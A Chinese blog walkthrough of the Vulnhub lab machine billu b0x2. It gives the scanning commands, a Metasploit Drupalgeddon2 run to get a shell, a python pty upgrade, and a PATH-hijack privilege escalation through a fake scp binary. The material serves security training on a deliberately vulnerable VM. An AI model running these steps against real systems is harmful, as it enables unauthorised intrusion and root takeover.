zoukankan      html  css  js  c++  java
  • Vulnhub靶场练习:billu b0x2

      一、环境搭建

    1、靶场环境官方下载链接:https://www.vulnhub.com/entry/billu-b0x-2,238/,到Download处下载

    2、靶场环境为.ova格式,使用Oracle VM VirtualBox虚拟机软件导入即可

    3、启动靶场环境,为了方便练习,已经设置虚拟机网络的桥接模式

     二、攻略步骤

    1、因为靶场启动之后,首页直接出现了ip地址,所以省略了收集ip的步骤,直接扫描端口,寻找突破点

    输入命令:nmap 192.168.0.102 -p- -T4

     发现有开启80端口,一般突破点都是从HTTP网页上边来突破,所以可以直接访问寻找突破口

    2、打开浏览器访问http://192.168.0.102/之后,发现有登录框,搜索框,网站为Drupal框架

     3、使用dirb进一步扫描探测目录,看是否有更多文件,发现robots.txt文件

     访问之后,发现更多信息泄漏的文件

     3、根据扫描的目录,发现有/core/install.php页面,访问得到Drupal框架具体版本

    4、Drupal有一个注入漏洞,可getshell,所以可以尝试一下,启动MSF来直接利用

    输入命令:msfconsole,启动MSF

    输入命令:search Drupal,来搜索要使用的针对Drupal攻击的利用脚本

    输入命令:use exploit/unix/webapp/drupal_drupalgeddon2,进入利用脚本

    输入命令:show options,显示需要利用脚本的话要设置的参数

    脚本要设置的参数已经设置了默认的部分,只要设置RHOSTS攻击的目标地址就行

    输入命令:set RHOSTS 192.168.0.102,设置要攻击的目标ip

    最后输入命令:run,执行攻击,成功getshell

     5、当前shell交互如果觉得不舒服,可以执行python -c 'import pty; pty.spawn("/bin/bash")'  来获得交互shell

    6、因为目标设置的为需要root权限,当前权限仅为www-data用户权限,所以下一步需要提权

    输入命令:uname -a,查看当前系统内核版本

     

     7、收集系统下文件信息,在/opt目录下,发现一个文件名为s的可疑文件,所有权限都为root

     

     8、使用strings命令,查看二进制,发现在执行scp命令时候使用root权限,但是没有指定root下的绝对路径

     9、根据上边得到的信息,我们可以创建一个假的scp命令之后,将假的scp命令添加到环境变量之中来实现提权

    输入命令:cd /tmp,切换进入到/tmp临时目录

    输入命令:echo "/bin/bash" > scp,将运行“/bin/bash" shell的命令写入到名字为scp的文件之后

    输入命令:chmod +x scp,赋予scp文件执行权限

    输入命令: export PATH=/tmp:$PATH ,将/tmp目录追加到现有的环境变量之中

    输入命令:cd /opt,切换回之前的/opt目录之中

    输入命令: ./s,执行s脚本,成功提权

     完

  • 相关阅读:
    复位电路
    Tcl与Design Compiler (十三)——Design Compliler中常用到的命令(示例)总结
    Python Twisted系列教程1:Twisted理论基础
    Python Twisted架构英文版
    Python Twisted网络编程框架与异步编程入门教程
    windows下安装Python虚拟环境virtualenvwrapper-win
    数据库事务解析
    Python之select模块解析
    windows右键打开方式里面添加新的应用程序
    HTTP协议的状态码
  • 原文地址:https://www.cnblogs.com/sym945/p/13412167.html
Copyright © 2011-2022 走看看